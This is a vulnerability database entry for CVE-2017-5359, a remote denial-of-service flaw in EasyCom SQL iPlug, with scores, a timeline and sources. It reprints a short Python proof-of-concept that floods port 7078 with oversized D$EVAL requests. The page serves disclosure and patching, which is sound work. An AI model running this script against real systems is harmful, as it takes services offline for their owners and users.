| CVSS Meta Temp Score | Current Exploit Price (≈) | CTI Interest Score |
|---|---|---|
| 6.1 | $0-$5k | 0.00 |
Summary
A vulnerability was found in EasyCom. It has been declared as problematic. Impacted is an unknown function of the component SQL iPlug. The manipulation results in input validation. This vulnerability was named CVE-2017-5359. The attack may be performed from remote. In addition, an exploit is available. It is recommended to upgrade the affected component.
Details
A vulnerability was found in EasyCom (version now known). It has been classified as problematic. Affected is some unknown processing of the component SQL iPlug. The manipulation with an unknown input leads to a input validation vulnerability. CWE is classifying the issue as CWE-20. The product receives input or data, but it does
not validate or incorrectly validates that the input has the
properties that are required to process the data safely and
correctly. This is going to have an impact on availability. CVE summarizes:
EasyCom SQL iPlug allows remote attackers to cause a denial of service via the D$EVAL parameter to the default URI.
The bug was discovered 02/22/2017. The weakness was presented 02/22/2017 by John Page (hyp3rlinx) as EasyCom SQL iPlug Denial Of Service as not defined mailinglist post (Full-Disclosure). The advisory is available at seclists.org. This vulnerability is traded as CVE-2017-5359 since 01/13/2017. The exploitability is told to be easy. It is possible to launch the attack remotely. The exploitation doesn't require any form of authentication. Technical details are unknown but a public exploit is available.
A public exploit has been developed by John Page and been published immediately after the advisory. The exploit is shared for download at seclists.org. It is declared as proof-of-concept. The vulnerability was handled as a non-public zero-day exploit for at least 62 days. During that time the estimated underground price was around $0-$5k. The code used by the exploit is:
import socket
print 'EasyCom SQL-IPLUG DOS 0day!'
print 'hyp3rlinx'
IP = raw_input("[IP]> ")
PORT = 7078
payload="A"*43000
arr=[]
c=0
while 1:
try:
arr.append(socket.create_connection((IP,PORT)))
arr[c].send('GET /?D$EVAL='+payload+" HTTP/1.1\r\n\r\n")
c+=1
print "doit!"
except socket.error:
print "[*] 5th ave 12:00"
raw_input()
breakUpgrading eliminates this vulnerability.
The vulnerability is also documented in the databases at Exploit-DB (41426) and SecurityFocus (BID 96420†). See VDB-97277 for similar entry. VulDB is the best source for vulnerability data and more expert information about this specific topic.
Product
Name
CPE 2.3
CPE 2.2
CVSSv4
VulDB Vector: 🔍VulDB Reliability: 🔍
CVSSv3
VulDB Meta Base Score: 6.4VulDB Meta Temp Score: 6.1
VulDB Base Score: 5.3
VulDB Temp Score: 4.8
VulDB Vector: 🔍
VulDB Reliability: 🔍
NVD Base Score: 7.5
NVD Vector: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Vector | Complexity | Authentication | Confidentiality | Integrity | Availability |
|---|---|---|---|---|---|
| Unlock | Unlock | Unlock | Unlock | Unlock | Unlock |
| Unlock | Unlock | Unlock | Unlock | Unlock | Unlock |
| Unlock | Unlock | Unlock | Unlock | Unlock | Unlock |
VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Reliability: 🔍
NVD Base Score: 🔍
Exploiting
Class: Input validationCWE: CWE-20
CAPEC: 🔍
ATT&CK: 🔍
Physical: No
Local: No
Remote: Yes
Availability: 🔍
Access: Public
Status: Proof-of-Concept
Author: John Page
Download: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
Price Prediction: 🔍
Current Price Estimation: 🔍
| 0-Day | Unlock | Unlock | Unlock | Unlock |
|---|---|---|---|---|
| Today | Unlock | Unlock | Unlock | Unlock |
Exploit-DB: 🔍
Threat Intelligence
Interest: 🔍Active Actors: 🔍
Active APT Groups: 🔍
Countermeasures
Recommended: UpgradeStatus: 🔍
0-Day Time: 🔍
Exploit Delay Time: 🔍
Timeline
12/22/2016 🔍01/13/2017 🔍
02/22/2017 🔍
02/22/2017 🔍
02/22/2017 🔍
02/24/2017 🔍
02/24/2017 🔍
03/15/2017 🔍
12/03/2025 🔍
Sources
Advisory: EasyCom SQL iPlug Denial Of ServiceResearcher: John Page (hyp3rlinx)
Status: Confirmed
CVE: CVE-2017-5359 (🔍)
GCVE (CVE): GCVE-0-2017-5359
GCVE (VulDB): GCVE-100-97278
SecurityFocus: 96420 - EasyCom SQL iPlug CVE-2017-5359 Denial of Service Vulnerability
OSVDB: - CVE-2017-5359 - EasyCom - SQL iPlug - Denial of Service Issue
scip Labs: https://www.scip.ch/en/?labs.20161013
See also: 🔍
Entry
Created: 02/24/2017 16:40Updated: 12/03/2025 11:50
Changes: 02/24/2017 16:40 (69), 09/02/2020 12:59 (5), 12/03/2025 11:50 (20)
Complete: 🔍
Cache ID: 216:99C:103
No comments yet. Languages: en.
Please log in to comment.